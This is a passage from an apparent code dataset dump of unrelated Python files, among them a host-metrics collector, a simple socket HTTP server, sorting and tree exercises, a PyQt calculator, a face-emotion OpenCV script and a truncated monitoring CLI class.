open('/proc/stat', 'r')\n\n values3 = f3.readline().split()\n total_time3 = 0\n for i in values3[1:]:\n total_time3 += int(i)\n idle_time3 = int(values3[4])\n iowait_time3 = int(values3[5])\n\n f3.close()\n\n idle_time = idle_time3 - idle_time2\n iowait_time = iowait_time3 - iowait_time2\n total_time = total_time3 - total_time2\n cpu_percentage = int(100.0 * (total_time - idle_time - iowait_time) / total_time)\n\n copyfile('/proc/stat', '../tmp/cpu_stat')\n return cpu_percentage\n\n\ndef network_io_kbitps():\n \"\"\"Return network I/O statistics for every network interface\n installed on the system as a dict of raw tuples.\n\n \"\"\"\n list = getNetWorks()\n if not list:\n return None\n f1 = open(\"/proc/net/dev\", \"r\")\n lines1 = f1.readlines()\n f1.close()\n\n # list = ['bond0', 'bond1', 'lo']\n retdict1 = {}\n for line1 in lines1[2:]:\n colon1 = line1.find(':')\n assert colon1 > 0, line1\n name1 = line1[:colon1].strip()\n if list.count(name1):\n fields1 = line1[colon1 + 1:].strip().split()\n bytes_recv1 = float('%.4f' % (float(fields1[0]) * 0.0078125))\n bytes_sent1 = float('%.4f' % (float(fields1[8]) * 0.0078125))\n retdict1[name1] = (bytes_recv1, bytes_sent1)\n\n time.sleep(1)\n f2 = open(\"/proc/net/dev\", \"r\")\n lines2 = f2.readlines()\n f2.close()\n retdict2 = {}\n for line2 in lines2[2:]:\n colon2 = line2.find(':')\n assert colon2 > 0, line2\n name2 = line2[:colon2].strip()\n if list.count(name2):\n fields2 = line2[colon2 + 1:].strip().split()\n bytes_recv2 = float('%.4f' % (float(fields2[0]) * 0.0078125))\n bytes_sent2 = float('%.4f' % (float(fields2[8]) * 0.0078125))\n retdict2[name2] = (bytes_recv2, bytes_sent2)\n\n retdict = merge_with(retdict2, retdict1)\n return retdict\n\n\ndef disk_io_Kbps():\n if not IO_FILTER:\n return None\n iostat = Popen(\"iostat -d -k 1 2 | sed '/Device\\|Linux\\|^$/d' |\" + IO_FILTER + \"> ../tmp/disk_io\", shell=True,\n stdout=PIPE, stderr=PIPE, close_fds=True)\n iostat_error = iostat.communicate()[1].strip()\n if iostat_error:\n logger.error(\"iostat not exists, %s\" % iostat_error)\n return None\n\n retdict = {}\n f = open('../tmp/disk_io', 'r')\n lines = f.readlines()\n for line in lines:\n name, _, readkps, writekps, _, _, = line.split()\n if name:\n readkps = float(readkps)\n writekps = float(writekps)\n retdict[name] = (readkps, writekps)\n f.close()\n return retdict\n\n\ndef merge_with(d1, d2, fn=lambda x, y: tuple(map(operator.sub, x, y))):\n res = d1.copy() # \"= dict(d1)\" for lists of tuples\n for key, val in d2.iteritems(): # \".. in d2\" for lists of tuples\n try:\n res[key] = fn(res[key], val)\n except KeyError:\n res[key] = val\n return res\n\n\ndef get_load():\n try:\n f = open('/proc/loadavg', 'r')\n tmp = f.readline().split()\n lavg_1 = float(tmp[0])\n lavg_5 = float(tmp[1])\n lavg_15 = float(tmp[2])\n f.close()\n except:\n return None\n return lavg_1, lavg_5, lavg_15\n\n\ndef get_tcp_status():\n check_cmd = \"command -v ss\"\n check_proc = Popen(check_cmd, shell=True, stdout=PIPE, close_fds=True)\n ss = check_proc.communicate()[0].rstrip('\\n')\n if ss:\n cmd = \"ss -ant | awk '{if(NR != 1) print NULL}' | awk '{state=NULL;arr[state]++} END{for(i in arr){printf \\\"%s=%s \\\", i,arr[i]}}' | sed 's/-/_/g' | sed 's/ESTAB=/ESTABLISHED=/g' | sed 's/FIN_WAIT_/FIN_WAIT/g'\"\n else:\n cmd = \"netstat -anp | grep tcp | awk '{print NULL}' | awk '{state=NULL;arr[state]++} END{for(i in arr){printf \\\"%s=%s \\\", i,arr[i]}}' | tail -n 1\"\n tcp_proc = Popen(cmd, shell=True, stdout=PIPE, close_fds=True)\n tcp_status = tcp_proc.communicate()[0].rstrip('\\n')\n return tcp_status\n\n\ndef get_proc_number():\n cmd = \"ps axu | wc -l | tail -n 1\"\n proc_func = Popen(cmd, shell=True, stdout=PIPE, close_fds=True)\n proc_number = proc_func.communicate()[0].rstrip('\\n')\n return proc_number\n\n\ndef all_index():\n return (\n int(time.time() * 1000),\n get_cpu_time(),\n get_mem_usage_percent(),\n check_disk(),\n disk_io_Kbps(),\n network_io_kbitps(),\n get_load(),\n # get_tcp_status(),\n get_proc_number()\n )\n\n\ndef get_local_ip(ifname):\n import fcntl, struct\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n inet = fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', ifname[:15]))\n return socket.inet_ntoa(inet[20:24])\n\n\ndef get_cpu_forecast():\n # node_id = roboter.getNodeId()\n node_id = '167898152'\n threeDayAgo = (datetime.datetime.now() - datetime.timedelta(days=3))\n timeStamp = int(time.mktime(threeDayAgo.timetuple()) * 1000)\n client = ksql.KSQLAPI('http://10.1.236.40:8099')\n query = client.query(\n \"select TIMESTAMP,FORECAST,STDDEV from PM_HOST_CPU_PREDICTED where ROWKEY = '%s' and Windowstart >= %s\" % (\n node_id, timeStamp))\n query_result = ''\n for items in query:\n query_result = query_result + items\n\n results = json.loads(query_result)\n forecast_result = {}\n for item in results:\n if item.has_key('row'):\n result = item.values()\n forecast_result[\"timestamp\"] = result[0]['columns'][0]\n forecast_result[\"forecast\"] = result[0]['columns'][1]\n f = result[0]['columns'][2]\n a = '%.1f' % f\n forecast_result[\"stddev\"] = a\n\n return forecast_result\n\n\ndef collector():\n timestamp, cpu, mem, disk, disk_io, net, load, process_number = all_index()\n disk_utilization = ''\n disk_io_read = ''\n disk_io_write = ''\n internet_networkrx = ''\n internet_networktx = ''\n tcp_status_count = ''\n tcp_status = None\n period_1 = ''\n period_5 = ''\n period_15 = ''\n symbole = '\\n'\n\n is_forecast = roboter.getConfigVal(\"is_forecast\")\n\n if is_forecast == '':\n is_forecast = 0\n\n if is_forecast == '1':\n cpu_forecast = {}\n cpu_forecast = {\"dimension\": \"CPU_FORECAST\", \"kpi_id\": \"9011\", \"value\": json.dumps(get_cpu_forecast())}\n\n # cpu_utilization = 'CPUUtilization ' + str(timestamp) + ' ' + str(cpu) + ' Percent CPU\\n'\n cpu_utilization = {\"dimension\": \"CPU\", \"kpi_id\": \"9001\", \"value\": str(cpu)}\n # cpu_user = {\"dimension\":\"AvgUser\",\"name\":\"CPUDetail\",\"value\":\"20\"}\n # cpu_sys = {\"dimension\":\"AvgSystem\",\"name\":\"CPUDetail\",\"value\":\"10\"}\n # memory_utilization = 'MemoryUtilization ' + str(timestamp) + ' ' + str(mem[0]) + ' Percent Memory\\n'\n memory_utilization = {\"dimension\": \"Memory\", \"kpi_id\": \"9002\", \"value\": str(mem[0])}\n # memory_total = {\"dimension\":\"MemoryTotal\",\"name\":\"MemoryDetail\",\"value\":str(mem[2]),\"unit\":\"GB\"}\n # memory_use = {\"dimension\":\"MemoryConsts\",\"name\":\"MemoryDetail\",\"value\":str(mem[3]),\"unit\":\"GB\"}\n if load:\n # period_1 = 'LoadAverage ' + str(timestamp) + ' ' + str(load[0]) + ' count 1min\\n'\n # period_5 = 'LoadAverage ' + str(timestamp) + ' ' + str(load[1]) + ' count 5min\\n'\n # period_15 = 'LoadAverage ' + str(timestamp) + ' ' + str(load[2]) + ' count 15min\\n'\n period_1_temp = {\"dimension\": \"1min\", \"kpi_id\": \"9004\", \"value\": str(load[0])}\n period_1 = json.dumps(period_1_temp) + ','\n period_5_temp = {\"dimension\": \"5min\", \"kpi_id\": \"9004\", \"value\": str(load[1])}\n period_5 = json.dumps(period_5_temp) + ','\n period_15_temp = {\"dimension\": \"15min\", \"kpi_id\": \"9004\", \"value\": str(load[2])}\n period_15 = json.dumps(period_15_temp) + ','\n if disk:\n for name, value in disk.items():\n disk_tmp = {\"kpi_id\": \"9003\", \"dimension\": name, \"value\": str(value[0])}\n disk_utilization = disk_utilization + json.dumps(disk_tmp) + ','\n\n if disk_io:\n for name, value in disk_io.items():\n disk_io_read_tmp = {\"kpi_id\": \"9005\", \"dimension\": name, \"value\": str(round(float(value[0]) / 1024, 2))}\n disk_io_write_tmp = {\"kpi_id\": \"9006\", \"dimension\": name, \"value\": str(round(float(value[1]) / 1024, 2))}\n disk_io_read = disk_io_read + json.dumps(disk_io_read_tmp) + ','\n disk_io_write = disk_io_write + json.dumps(disk_io_write_tmp) + ','\n if net:\n for name, value in net.items():\n internet_networkrx_tmp = {\"kpi_id\": \"9007\", \"dimension\": name,\n \"value\": str(round(float(value[0]) / 1024, 2))}\n internet_networktx_tmp = {\"kpi_id\": \"9008\", \"dimension\": name,\n \"value\": str(round(float(value[1]) / 1024, 2))}\n internet_networkrx = internet_networkrx + json.dumps(internet_networkrx_tmp) + ','\n internet_networktx = internet_networktx + json.dumps(internet_networktx_tmp) + ','\n\n if tcp_status:\n status_count = tcp_status.split()\n for element in status_count:\n key_value = element.split('=')\n tcp_status_count_tmp = {\"kpi_id\": \"9009\", \"dimension\": key_value[0], \"value\": key_value[1]}\n tcp_status_count = tcp_status_count + json.dumps(tcp_status_count_tmp) + ','\n\n # process_count = 'ProcessCount ' + str(timestamp) + ' ' + process_number + ' Count Process\\n'\n process_count = {\"kpi_id\": \"9010\", \"dimension\": \"Process\", \"value\": process_number}\n data_post = json.dumps(cpu_utilization) + ',\\n' + json.dumps(\n memory_utilization) + ',\\n' + period_1 + symbole + period_5 + symbole + period_15 + symbole + disk_utilization + symbole + disk_io_read + symbole + disk_io_write + symbole + internet_networkrx + symbole + internet_networktx + symbole + tcp_status_count + symbole + json.dumps(\n process_count)\n\n instanceid = roboter.getNodeIp()\n nodeCode = roboter.getNodeId()\n headers = {\"content_Type\": \"text/plain\", \"Accept\": \"text/plain\", \"hold\": \"300\", \"node_Code\": nodeCode,\n \"instance_Id\": instanceid, \"group\": \"Decoding\", \"time\": str(timestamp)}\n\n header = '''{\"header\":''' + json.dumps(headers) + ''',\"content\":['''\n\n roboter.setContent(header + data_post + ''']}''')\n\n\nif __name__ == '__main__':\n\n if not os.path.exists(\"../tmp\"):\n os.mkdir(\"../tmp\")\n\n collector()","sub_path":"com/asiainfo/aihc/host_metrics.py","file_name":"host_metrics.py","file_ext":"py","file_size_in_byte":14830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"208706755","text":"# Servidor básico em python para escutar porta 80 \n#\n# 7eAo1200000010173XXXXIIIIIIIIIXXXX7E\n#\n\n\nimport socket\n\nHOST = ''\nPORT = 81 # porta que escuta http\n\ndef sendHTTP(msg):\n resp = ('HTTP/1.1 404 OK\\r\\n'\n 'Content-Type: text/html\\r\\n'\n 'Connection: Close\\r\\n' \n '\\r\\n' \n '\\r\\n '+msg+'

' + msg + '

\\r\\n\\r\\n')\n return resp \n\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: \n s.bind((HOST,PORT))\n s.listen(1)\n while True:\n conn, addr = s.accept()\n print('Endereco '+ str(addr)+ '\\n')\n while True:\n data = conn.recv(1024) # recebe os dados da conexao \n\n if not data: # se nao tem mais dados termina \n break\n\n print('recebendo os dados \\n') \n print(data.decode())\n msg = sendHTTP('OK')\n conn.send(msg.encode())\n # conn.close() \n break\n conn.close() ","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"60217231","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 13 16:48:48 2018\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nplt.xkcd()\r\nx=np.linspace(0,20,40)\r\ny1=x**2+1\r\nplt.figure(figsize=(4,4))\r\nplt.plot(x,y1,color='b')\r\nplt.figure()\r\ny2=x**3\r\nplt.plot(x,y2,color='g')\r\nplt.figure()\r\nplt.plot(x,y1)\r\nplt.plot(x,y2)\r\nplt.xlim(0,10)\r\nplt.ylim(0,100)\r\nplt.xlabel('X',fontsize=14)\r\nplt.ylabel('Y',fontsize=14)\r\nplt.xticks(np.linspace(0,10,5))","sub_path":"matplotlib/matplotlib_2_plot.py","file_name":"matplotlib_2_plot.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"556228374","text":"#! /usr/bin/env python3\r\n# -*- Coding:utf-8 -*-\r\n\r\nclass dict(dict):\r\n\r\n \r\n def _remove_value(self,value):\r\n return remove_value(self,value)\r\n \r\n def _remove_key(self,key):\r\n self=remove_key(self.key)\r\n pass\r\n\r\ndef remove_value(dic,values):\r\n\r\n if values==None:\r\n\r\n return {_key:dic[_key] for _key in dic if dic[_key] != values}\r\n else:\r\n\r\n return {_key:dic[_key] for _key in dic if dic[_key]not in set(values)}\r\n\r\n\r\ndef remove_key(dic,keys):\r\n\r\n if keys==None:\r\n\r\n return {_key:dic[_key] for _key in dic if _key != keys}\r\n else:\r\n\r\n return {_key:dic[_key] for _key in dic if _key not in set(keys)}\r\n\r\nif __name__=='__main__':\r\n d=dict({0:'a',1:None,2:None,3:'d', None:'a', None:None})\r\n\r\n #d=remove_value(d,None)\r\n print(d)\r\n print(d._remove_value(None).values())\r\n\r\n print(remove_value(d,None))\r\n\r\n print(remove_key(d,None))","sub_path":"minghu6/algs/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"121832789","text":"''' When you write the configuration file the ordering is very much important '''\nfrom layout_code_2 import DrawPanel\n\n#no common property here\n\n'''name space region context label '''\npanel_code = DrawPanel('object_light','PROPERTIES','WINDOW','object','Object Light')\npanel_code.set_file_name('properties_object_light.py')\n\n''' each property consists of five parts - context, name, type, do_implement, label'''\n\nproperties = []\n\n''' common properties '''\n\nproperties.append(['scene','ml_enable','bool',False,'Enable Meshlight'])\nproperties.append(['scene','bgp_enable','bool',False,'Enable Bgportallight'])\nproperties.append(['scene','vol_enable','bool',False,'Enable Volume'])\n\npanel_code.add_properties(properties)\n\npanel_code.add_enum('ml_enable', 'True', ['scene','ml_color','color',False,'Meshlight Color'])\npanel_code.add_enum('ml_enable', 'True', ['scene','ml_power','float',False,'Power'])\npanel_code.add_enum('ml_enable', 'True', ['scene','ml_samples','int',False,'Samples'])\npanel_code.add_enum('ml_enable', 'True', ['scene','ml_double_sided','bool',False,'Double Sided'])\n\npanel_code.add_enum('bgp_enable', 'True', ['scene','bgp_power','float',False,'Power'])\npanel_code.add_enum('bgp_enable', 'True', ['scene','bgp_samples','int',False,'Samples'])\npanel_code.add_enum('bgp_enable', 'True', ['scene','bgp_with_caustic','bool',False,'With Caustic'])\npanel_code.add_enum('bgp_enable', 'True', ['scene','bgp_with_diffuse','bool',False,'With Diffuse'])\npanel_code.add_enum('bgp_enable', 'True', ['scene','bgp_photon_only','bool',False,'Photons Only'])\n\n\npanel_code.add_enum('vol_enable', 'True', ['scene','vol_region','enum',False,'Volume Region'])\npanel_code.add_enum('vol_enable', 'True', ['scene','vol_absorp','float',False,'Absroption'])\npanel_code.add_enum('vol_enable', 'True', ['scene','vol_scatter','float',False,'Scatter'])\n\npanel_code.add_enum_values('vol_region',['ExpDensity Volume','Noise Volume', 'Uniform Volume'])\n\npanel_code.add_enum('vol_region', 'ExpDensity Volume', ['scene','vol_height','float',False,'Height'])\npanel_code.add_enum('vol_region', 'ExpDensity Volume', ['scene','vol_steepness','float',False,'Steepness'])\n\npanel_code.add_enum('vol_region', 'Noise Volume', ['scene','vol_sharpness','float',False,'Sharpness'])\npanel_code.add_enum('vol_region', 'Noise Volume', ['scene','vol_cover','float',False,'Cover'])\npanel_code.add_enum('vol_region', 'Noise Volume', ['scene','vol_density','float',False,'Density'])\n\n'''other settings '''\n#panel_code.add_additional_poll_text('context.scene.render')\npanel_code.poll_unreg_module.append('properties_object')\n\npanel_code.generate_code(20)\n","sub_path":"conf_files/meshlight_conf.py","file_name":"meshlight_conf.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"145020150","text":"import boto3\n\nboto3.setup_default_session(profile_name='rm_profile')\nclient = boto3.client('ssm')\n\n\ndef get_secret(key):\n resp = client.get_parameter(\n Name=key,\n WithDecryption=False\n )\n return resp['Parameter']['Value']\n\n\ncmx_username = get_secret('client_id')","sub_path":"python/aws_boto_get_ssm_param.py","file_name":"aws_boto_get_ssm_param.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"548394117","text":"def my_function():\n x = int(input(\"What is the maximal length of the triangle side? Enter a number: \"))\n solutions = []\n for x in range(5, x):\n for y in range(4, x):\n for z in range(3, x):\n if (x * x == y * y + z * z):\n solutions.append([x, y, z])\n m = 0\n for solution in solutions:\n if m < max(solution):\n m = max(solution)\n return m\n\n\nprint(my_function())","sub_path":"your-code/challenge3-solution.py","file_name":"challenge3-solution.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"382514138","text":"\"\"\"\nIn a binary tree, the root node is at depth 0, and children of each depth k node are at depth k+1.\n\nTwo nodes of a binary tree are cousins if they have the same depth, but have different parents.\n\nWe are given the root of a binary tree with unique values, and the values x and y of two different nodes in the tree.\n\nReturn true if and only if the nodes corresponding to the values x and y are cousins.\n\nExample 1:\n Input: root = [1,2,3,4], x = 4, y = 3\n Output: false\n\nExample 2:\n Input: root = [1,2,3,null,4,null,5], x = 5, y = 4\n Output: true\n\nExample 3:\n Input: root = [1,2,3,null,4], x = 2, y = 3\n Output: false\n\nNote:\n The number of nodes in the tree will be between 2 and 100.\n Each node has a unique integer value from 1 to 100.\n\"\"\"\n\nfrom binarytree import build\n\ndef isCousins(root, x, y):\n def dfs(root, x, y, d):\n if root == None:\n return None\n if root.value == x:\n return [d, None]\n if root.value == y:\n return [None, d]\n\n temp_d_list = [None, None]\n children = [root.left, root.right]\n for child in children:\n if child:\n d_list = dfs(child, x, y, d + 1)\n if d_list == True:\n return True\n elif d_list == False:\n return False\n elif d_list != [None, None]:\n for i in range(2):\n if d_list[i] != None:\n temp_d_list[i] = d_list[i]\n\n if temp_d_list[0] != None and temp_d_list[1] != None:\n if temp_d_list[0] == temp_d_list[1] and temp_d_list[0] != d + 1:\n return True\n else:\n return False\n else:\n return temp_d_list\n\n if dfs(root, x, y, 0) == True:\n return True\n else:\n return False\n\n\nroot1 = build([1,2,3,4])\nx1 = 4\ny1 = 3\nprint(root1)\nprint(isCousins(root1, x1, y1))\n\nroot2 = build([1,2,3,None,4,None,5])\nx2 = 5\ny2 = 4\nprint(root2)\nprint(isCousins(root2, x2, y2))\n\nroot3 = build([1, 2, 3, None, 4])\nx3 = 2\ny3 = 3\nprint(root3)\nprint(isCousins(root3, x3, y3))\n\nroot4 = build([1,2,None,3,4,None,None,5])\nprint(root4)\nx4 = 2\ny4 = 4\nprint(isCousins(root1, x4, y4))\n\n\n","sub_path":"LeetCode-Python/993 Cousins in Binary Tree.py","file_name":"993 Cousins in Binary Tree.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"212398669","text":"import glob\nimport json\nimport os\nfrom collections import OrderedDict\n\n\nclass LedgerRestMetrics():\n\n def __init__(self, dataset, boundaries):\n [abs_min_ts, abs_max_ts] = boundaries\n\n duration = abs_max_ts-abs_min_ts+1\n\n timestamps = [float(x) for x in dataset.keys()]\n\n seconds = [int(x / 1e3) for x in timestamps]\n\n averaged_dataset = {}\n\n for second in seconds:\n a = second*1e3\n b = (1+second)*1e3\n\n dic = list(filter(lambda x:(x >= a and x <= b), timestamps))\n\n stash = {\n 'createTransactionLatency': 0,\n 'forwardTransferLatency': 0,\n }\n\n for di in dic:\n item = dataset[str(int(di))]\n stash['createTransactionLatency'] = (stash['createTransactionLatency'] + item['createTransactionLatency']) / 2\n stash['forwardTransferLatency'] = (stash['forwardTransferLatency'] + item['forwardTransferLatency']) / 2\n\n averaged_dataset[str(second)] = stash\n\n averaged_dataset = OrderedDict(sorted(averaged_dataset.items()))\n\n prev_item = None\n for second in reversed(seconds):\n item = averaged_dataset[str(second)]\n if prev_item and item['createTransactionLatency'] == 0 and item['forwardTransferLatency'] == 0:\n averaged_dataset[str(second)] = prev_item\n prev_item = item\n\n if not averaged_dataset:\n raise AssertionError(\"ledger-rest metrics empty\")\n\n min_ts = int(min(averaged_dataset.keys()))\n max_ts = int(max(averaged_dataset.keys()))\n\n if abs_min_ts < min_ts:\n for i in range(abs_min_ts, min_ts, 1):\n averaged_dataset[str(i)] = averaged_dataset[str(min_ts)]\n if abs_max_ts > max_ts:\n for i in range(max_ts, abs_max_ts, 1):\n averaged_dataset[str(i+1)] = averaged_dataset[str(max_ts)]\n if len(averaged_dataset) != duration:\n for i in range(abs_min_ts, abs_max_ts, 1):\n if not str(i) in averaged_dataset:\n averaged_dataset[str(i)] = averaged_dataset[str(i-1)]\n\n self.dataset = averaged_dataset\n\n def get_metric(self, metric):\n result = {}\n for ts, data in self.dataset.items():\n result[int(ts)] = int(data[metric])\n return result\n","sub_path":"scripts/metrics/ledger_rest.py","file_name":"ledger_rest.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"292117946","text":"import sys\nfrom operation import *\nfrom pushbutton import PushButton\nfrom PyQt5.QtGui import QKeyEvent\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import (QWidget, QGridLayout,\n QApplication, QLineEdit)\n\n\nclass Calculator(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n grid = QGridLayout()\n self.setLayout(grid)\n self.screen = QLineEdit()\n self.bottom = []\n self.text = ''\n\n # 按钮和位置初始化\n names = ['clear',\n '7', '8', '9', '/',\n '4', '5', '6', '*',\n '1', '2', '3', '-',\n '0', '.', '=', '+']\n positions = [(i+1,j) for i in range(4) for j in range(4)]\n positions = [(0, 3)] + positions\n\n grid.setSpacing(10)\n\n grid.addWidget(self.screen, 0, 0, 1, 3)\n for position, name in zip(positions,names):\n locals()['btn_' + name] = PushButton(name, self)\n locals()['btn_' + name].clicked.connect(self.buttonClicked)\n self.bottom.append(locals()['btn_' + name])\n grid.addWidget(locals()['btn_' + name], *position)\n\n self.move(300, 150)\n self.setWindowTitle('Calculator by RoyD')\n self.show()\n\n def buttonClicked(self):\n sender = self.sender()\n if sender.text() == '=':\n self.output()\n else:\n if sender.text() == 'clear':\n self.text = ''\n else:\n self.text += sender.text()\n self.screen.setText(self.text)\n\n def keyPressEvent(self, event):\n keyEvent = QKeyEvent(event)\n if keyEvent.key() == Qt.Key_Escape: # Enter键无效,Escape可以表示触发\n #if keyEvent.key() == Qt.Key_Enter:\n self.output()\n\n def output(self):\n self.text = str_proc(self.text)\n self.screen.setText(str(operation(self.text)))\n self.text = ''\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Calculator()\n sys.exit(app.exec_())\n","sub_path":"test/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"331140134","text":"import aozora\nimport pandas\n\n\ndef test_aozora_request():\n expect = pandas.DataFrame([\n {'term': 'し', 'info1': '動詞', 'info2': '自立', 'freq': 100},\n {'term': 'こと', 'info1': '名詞', 'info2': '非自立', 'freq': 93},\n ])\n\n a = aozora.AozoraTokenize()\n text = a.request(\n 'https://www.aozora.gr.jp/cards/001428/files/50328_64360.html')\n text = a.extract(text)\n actual = a.freq(text).head(2).reset_index(drop=True)\n\n print(expect)\n print(actual)\n\n pandas.util.testing.assert_frame_equal(expect, actual)\n","sub_path":"tests/test_aozora.py","file_name":"test_aozora.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"329763390","text":"import pickle as cloudpickle\n\nfrom .scanner_type import ScannerType\n\nclass RootExpression(ScannerType):\n \"\"\"\n Collects from an assign context.\n Example\n\n x = FLOR_METRIC('x', e ) ... where e is an arbitrary root expression\n\n \"\"\"\n\n def __init__(self, name, file_path, class_ctx, func_ctx, prev_lsn, tuple_idx):\n \"\"\"\n\n :param file_path: file path of pre-annotated source where the highlight appears\n :param class_ctx: if func_ctx is a method, class to which the method belongs\n :param func_ctx: the function or root context (e.g. None) where this highlight appears.\n a.k.a. the context of the prev_lsn\n :param prev_lsn: The lsn of the log statement that statically immediately precedes the highlight\n the purpose is to narrow the scope of search and limit possibility of ambiguities\n :param follow_lsn: The lsn from which we want to extract data\n \"\"\"\n super().__init__(name, file_path, class_ctx, func_ctx, prev_lsn)\n self.tuple_idx = tuple_idx\n\n #State\n\n\n def consume_data(self, log_record, trailing_ctx, contexts):\n if trailing_ctx is not None and trailing_ctx.is_enabled(self):\n if log_record['lsn'] == self.prev_lsn:\n self.prev_lsn_enabled = True\n elif self.prev_lsn_enabled and log_record['lsn'] == self.follow_lsn:\n # Consume data from an assign context\n root_expressions = list(map(lambda d: {list(d.keys()).pop():\n cloudpickle.loads(eval(list(d.values()).pop()))} ,\n log_record['locals']))\n self.prev_lsn_enabled = False\n if self.tuple_idx is None:\n assert len(root_expressions) == 1\n return root_expressions.pop()\n else:\n return root_expressions[self.tuple_idx]\n","sub_path":"flor/log_scanner/state_machines/root_expression.py","file_name":"root_expression.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"238011081","text":"### helper function\ndef merge(a, b):\n c = []\n a_indx, b_indx = 0, 0\n while a_indx < len(a) and b_indx < len(b):\n if a[a_indx] < b[b_indx]:\n c.append(a[a_indx])\n a_indx += 1\n else:\n c.append(b[b_indx])\n b_indx += 1\n if a_indx == len(a):\n c.extend(b[b_indx:])\n else:\n c.extend(a[a_indx:])\n return c\n\ndef merge_sort(a):\n if len(a) <= 1:\n return a\n\n left, right = merge_sort(a[:len(a)//2]), merge_sort(a[len(a)//2:])\n\n return merge(left, right)\n\n\n# STRETCH: implement an in-place merge sort algorithm\ndef merge_in_place(arr, start, mid, end):\n # TO-DO\n\n return arr\n\ndef merge_sort_in_place(arr, l, r): \n # TO-DO\n\n return arr\n\n\n# TO-DO: implement the Quick Sort function below USING RECURSION\ndef quick_sort( arr):\n if len(arr) <= 1:\n return arr\n \n smaller, equal, larger = [], [], []\n pivot = arr[len(arr)-1]\n\n for number in arr:\n if number < pivot:\n smaller.append(number)\n elif number > pivot:\n larger.append(number)\n else:\n equal.append(number)\n \n return quick_sort(smaller)+equal+quick_sort(larger)\n\nprint(quick_sort([1, 5, 8, 4, 2, 9, -6, 0, -3, 7]))\n\n# STRETCH: implement the Timsort function below\n# hint: check out https://github.com/python/cpython/blob/master/Objects/listsort.txt\ndef timsort( arr ):\n\n return arr\n","sub_path":"project/recursive_sorting.py","file_name":"recursive_sorting.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"30964802","text":"import cv2\nimport label_image\nimport os \nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' \n\nsize = 4\n\n\nclassifier = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')\ncap = cv2.VideoCapture(0) \n\nwhile True:\n (ret, im) = cap.read()\n im=cv2.flip(im,1,0)\n\n mini = cv2.resize(im, (int(im.shape[1]/size), int(im.shape[0]/size)))\n\n # detect MultiScale / faces \n faces = classifier.detectMultiScale(mini)\n\n \n for f in faces:\n (x, y, w, h) = [v * size for v in f] #Scale the shapesize backup\n cv2.rectangle(im, (x,y), (x+w,y+h), (0,255,0), 4)\n \n cropped_face = im[y:y+h, x:x+w] # Draw rectangles around each face\n\n faceFile = \"test.jpg\" #Saving the current image from the webcam for testing.\n cv2.imwrite(faceFile, cropped_face)\n \n text = label_image.main(faceFile)# Gets result from the label_image file, i.e. customer is satisfied or not\n text = text.title()\n font = cv2.FONT_HERSHEY_TRIPLEX\n cv2.putText(im, text,(x+w,y), font, 1, (0,0,255), 2)\n\n # Show the image\n cv2.imshow('frame', im)\n key = cv2.waitKey(15)\n # if Esc key is press then break out of the loop \n if key == 27: #Esc key\n break\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"cs_analyzer.py","file_name":"cs_analyzer.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503214665","text":"#\n# Copyright 2014-2015 Boundary, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom boundary import AlarmModify\n\n\nclass AlarmUpdate(AlarmModify):\n def __init__(self):\n AlarmModify.__init__(self, True)\n self.alarm_id = None\n self.method = \"PUT\"\n\n self.cli_description = \"Creates a new metric definition in an Boundary account\"\n\n def addArguments(self):\n\n self.parser.add_argument('-i', '--alarm-id', dest='alarm_id', action='store', required=True,\n metavar='alarm_id', help='Id of the alarm to update')\n self.parser.add_argument('-n', '--alarm-name', 